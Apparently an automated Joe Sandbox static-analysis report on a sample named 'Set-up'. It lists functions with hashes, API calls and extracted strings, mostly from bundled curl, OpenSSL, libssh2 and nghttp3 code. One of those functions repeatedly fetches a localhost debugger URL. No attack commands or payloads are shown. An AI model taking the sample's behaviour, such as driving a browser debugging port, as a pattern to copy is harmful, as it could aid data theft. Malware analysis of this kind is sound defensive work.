Instruction ID: b34ee430b334475e09b57713dce5dd8cb1b394230216fe499507c9b15df0fe41
Opcode Fuzzy Hash: a8c5725902a1cafdd6570f64aa1b5da73738b16d76b84763a86f0d4073944c32
Instruction Fuzzy Hash: E45159B2D083415FD710AB90EC01BAFB7A09F86324F44843AF9899B342D675E984DB93

Function 00AAA33B Relevance: 27.4, APIs: 1, Strings: 17, Instructions: 425stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00AAA33C

Strings

[%s] done, result=%d, xrefs: 00AAA778
server did not report OK, got %d, xrefs: 00AAA937
ftp.c, xrefs: 00AAA5D9, 00AAA786
control connection looks dead, xrefs: 00AAA567
Failure sending ABOR command: %s, xrefs: 00AAA866
Remembering we are in dir "%s", xrefs: 00AAA7E9
QUOT string not accepted: %s, xrefs: 00AAA6E9
No data was received, xrefs: 00AAA45B
Exceeded storage allocation, xrefs: 00AAA8C4
[%s] closing DATA connection, xrefs: 00AAA353
ABOR, xrefs: 00AAA83B
Received only partial file: %lld bytes, xrefs: 00AAA604
partial download completed, closing connection, xrefs: 00AAA912
???, xrefs: 00AAA34D, 00AAA352, 00AAA76F, 00AAA777
Uploaded unaligned file size (%lld out of %lld bytes), xrefs: 00AAA5B2
, xrefs: 00AAA7CF
*, xrefs: 00AAA6D4

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $*$???$ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$QUOT string not accepted: %s$Received only partial file: %lld bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%lld out of %lld bytes)$[%s] closing DATA connection$[%s] done, result=%d$control connection looks dead$ftp.c$partial download completed, closing connection$server did not report OK, got %d
API String ID: 39653677-2752486839
Opcode ID: 2badbf614f66e9421094ddb484a10979d929b023c40f5ec1a51d2c99bcd74718
Instruction ID: 135664add525a0ebc8c303df2dc8625388e99088244e54ee85b7aa242df5c7be
Opcode Fuzzy Hash: 2badbf614f66e9421094ddb484a10979d929b023c40f5ec1a51d2c99bcd74718
Instruction Fuzzy Hash: B7F1B2756043009FDB10DF24C981B6ABBE5AFA6704F08897CF8899B2C2E775D944CB63

Function 00B3C9E0 Relevance: 24.3, APIs: 8, Strings: 8, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B3C9F0
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00B3CAE9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B3CB2E
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B3CB3B
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002C), ref: 00B3CB4F

Strings

ecdsa-sha2-nistp256, xrefs: 00B3C9E3
Internal error, xrefs: 00B3CD6E
Unknown method type, xrefs: 00B3CD47
The requested method(s) are not currently supported, xrefs: 00B3CC25
Error allocated space for method preferences, xrefs: 00B3CC10
Memory allocation failed, xrefs: 00B3CD50
No algorithm found, xrefs: 00B3CD32
Invalid parameter specified for method_type, xrefs: 00B3CC3A

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$memcpymemmovestrchr
String ID: Error allocated space for method preferences$Internal error$Invalid parameter specified for method_type$Memory allocation failed$No algorithm found$The requested method(s) are not currently supported$Unknown method type$ecdsa-sha2-nistp256
API String ID: 2200032093-2296067158
Opcode ID: 73d6973d74cf216bec49ae8337e2bf7b59cee0ffde45eaca970e3baeb13682fe
Instruction ID: 3156749524a20608484c1e4fb2dc4bf539697f3e71d32f30f31765b68af5fc87
Opcode Fuzzy Hash: 73d6973d74cf216bec49ae8337e2bf7b59cee0ffde45eaca970e3baeb13682fe
Instruction Fuzzy Hash: 0BA195719082059FDB109FA5D881B6ABFE4EF45314F2849F9F88ABB251E730ED04D792

Function 00CEE990 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 242COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CEEA90
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00CEEAD9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CEEB98

Strings

Calling OPENSSL_DIR_read("%s"), xrefs: 00CEEBD8
calling stat(%s), xrefs: 00CEEB25
file_open, xrefs: 00CEEA2D, 00CEEB07, 00CEEBFF
file_open_dir, xrefs: 00CEEBC0, 00CEEC6C
Given path=%s, xrefs: 00CEEC17
file:, xrefs: 00CEE9B2
localhost/, xrefs: 00CEE9FD
providers/implementations/storemgmt/file_store.c, xrefs: 00CEEA37, 00CEEB11, 00CEEBCA, 00CEEC09, 00CEEC76, 00CEECA5
file_open_stream, xrefs: 00CEEC9B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno_stat64tolower
String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
API String ID: 3401003986-2019258128
Opcode ID: 07f5128216e029de1d8b4c2f53ac732133db8f794d0df340d55c89d1786c2ad2
Instruction ID: 46acc4df6f859629ba122491c1909209f98e2fb5ea8b06a6bbc0cf5e23c89df4
Opcode Fuzzy Hash: 07f5128216e029de1d8b4c2f53ac732133db8f794d0df340d55c89d1786c2ad2
Instruction Fuzzy Hash: 59716A70A443407BD7207B229C03B6F7AA1AF45794F28092CFC955A2C3F7B5E541E3A2

Function 00DF82A0 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8303
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF831C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8336
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF835C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF836F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8389
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF83B6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF83E4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8421
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8434
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8450
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF847A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF84AD

Strings

`, xrefs: 00DF82B7

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc
String ID: `
API String ID: 2803490479-2679148245
Opcode ID: bef356a5559f2b21686d92a1e5b9ae3f96e160b17f5ad2bbc1b358e9e7333a33
Instruction ID: d4e9671a138f769d75bd3670924f652d43248f7e13bd467ef4686abb3a786f07
Opcode Fuzzy Hash: bef356a5559f2b21686d92a1e5b9ae3f96e160b17f5ad2bbc1b358e9e7333a33
Instruction Fuzzy Hash: 5371ADB1808345CFD341EF29C841659BFE0FF89304F168A6ED588DB3A2EB759401DB62

Function 00AC25D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

L-IR, xrefs: 00AC289C
CAPABILITY, xrefs: 00AC2797
PREAUTH connection, already authenticated, xrefs: 00AC2770
SASL, xrefs: 00AC2892
STARTTLS not available., xrefs: 00AC3094
TTLS, xrefs: 00AC2846
AUTH, xrefs: 00AC28C5
STAR, xrefs: 00AC283C
STARTTLS, xrefs: 00AC2D47
Got unexpected imap-server response, xrefs: 00AC3034
STARTTLS denied, xrefs: 00AC3068
LOGINDISABLED, xrefs: 00AC2867

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: 94d1aeedc112e5aad799e408bed54377d8f70559da93167b996a61b9fb23ad10
Instruction ID: a9ef3d46ab20991998d882f34cabda3c89f52f7e0a21e3ee40af0f1fd8ed3384
Opcode Fuzzy Hash: 94d1aeedc112e5aad799e408bed54377d8f70559da93167b996a61b9fb23ad10
Instruction Fuzzy Hash: 3EB17A72A04300ABDB119B24C881FBA77E4BF45704F1A813DE8895B282EB75DE84D792

Function 00A620AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A620D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A622D0

Strings

Failed to allocate memory for response., xrefs: 00A620F1
Failed to initialize curl., xrefs: 00A6213F
http://localhost:%d/json, xrefs: 00A62170
Attempt %d failed: %s, xrefs: 00A6229F
Q, xrefs: 00A62213
GET request succeeded on attempt %d., xrefs: 00A6225D
d, xrefs: 00A62178
All %d attempts to fetch debugger URL failed., xrefs: 00A622EF
+N, xrefs: 00A621B1
@, xrefs: 00A621F2

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: a6af2de9d75850f845d55f7720f60b0a92ae5bed8a7268cb4da1b9a991c37cc7
Instruction ID: d5bccd23ce939515ca3f25473c0815c5864d90e3a89e3786c4dfa929b8422594
Opcode Fuzzy Hash: a6af2de9d75850f845d55f7720f60b0a92ae5bed8a7268cb4da1b9a991c37cc7
Instruction Fuzzy Hash: F36192B49097099FDB00EFA8D58979EBBF0FF48314F00881DE598AB341D77999849F92

Function 00B04920 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00B0499C
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 00B04A0A
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 00B04A8E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 00B04AA3
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 00B04AB8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 00B04B1A

Strings

pri->urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00B04A9E
nghttp3_conn.c, xrefs: 00B04A00, 00B04A84, 00B04A99, 00B04AAE, 00B04B10
pri->inc == 0 || pri->inc == 1, xrefs: 00B04AB3
!conn->server, xrefs: 00B04A05
conn->server, xrefs: 00B04A89, 00B04B15

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 3718630003-1169204258
Opcode ID: b3f4441cb57d87bb9aa5d9d25dc6a2c114c14472b1e1e5cb01d6f56b5bb0dd00
Instruction ID: f5662bbadc154d11cb7e31a78bfc3377bce0cda433f7eddb34119075b2e61539
Opcode Fuzzy Hash: b3f4441cb57d87bb9aa5d9d25dc6a2c114c14472b1e1e5cb01d6f56b5bb0dd00
Instruction Fuzzy Hash: D15126B1B00305AFD7109E29DC46BAB7BE9EF45350F044569FB54861D1D770ED80CBA2

Function 00C14580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00AD8C0E,?), ref: 00C145E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00AD8C0E,?), ref: 00C1460A

Strings

ENGINE_by_id, xrefs: 00C146D5, 00C146FA, 00C14746
DIR_ADD, xrefs: 00C14683
dynamic, xrefs: 00C14604, 00C14633
LOAD, xrefs: 00C146BA
/data/curl-i686/lib/engines-3, xrefs: 00C1462B, 00C14682
id=%s, xrefs: 00C1475E
LIST_ADD, xrefs: 00C146A0
crypto/engine/eng_list.c, xrefs: 00C146DF, 00C14704, 00C14750
DIR_LOAD, xrefs: 00C1466A
OPENSSL_ENGINES, xrefs: 00C1461C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: 0225ebc05ba1f1a58f833c585c23531d812800b2b2f0d547b7b8bddbca43eeae
Instruction ID: b14d55b710af1670a66a24b09c1d84ce31ae517d6696dd192b1609dcded162b9
Opcode Fuzzy Hash: 0225ebc05ba1f1a58f833c585c23531d812800b2b2f0d547b7b8bddbca43eeae
Instruction Fuzzy Hash: 6B41D775F84314B7F63536626D03F9A31999B13F48F150028FD94AA2C3FA95DA90B1E2

Function 00AC6810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00AC6884
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00AC68AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AC68C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00AC6973
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00AC6983
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00AC6995

Strings

[, xrefs: 00AC69E1

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpystrchr$atoistrlen
String ID: [
API String ID: 444251876-784033777
Opcode ID: 3c117e8bbf4514e875d283bd12d9b1536c1a87c5293fd3673dd4c3715c36b6a5
Instruction ID: 78a97bac2dbf438a415b7eb030cb49a95a0a92b42dd41c99b591a5dfac569bce
Opcode Fuzzy Hash: 3c117e8bbf4514e875d283bd12d9b1536c1a87c5293fd3673dd4c3715c36b6a5
Instruction Fuzzy Hash: 69B1567190C3856BDB39DB258891F7BBBE8EB55304F1A052DF8C9C6181EB35CC448362

Function 00A663F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00A66467

Strings

hsts.c, xrefs: 00A6656B, 00A665CF
mite, xrefs: 00A66688
%s%s "%s", xrefs: 00A664AA
%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00A66540
unlimited, xrefs: 00A664A1
%d%02d%02d %02d:%02d:%02d, xrefs: 00A666D5
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00A66462

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

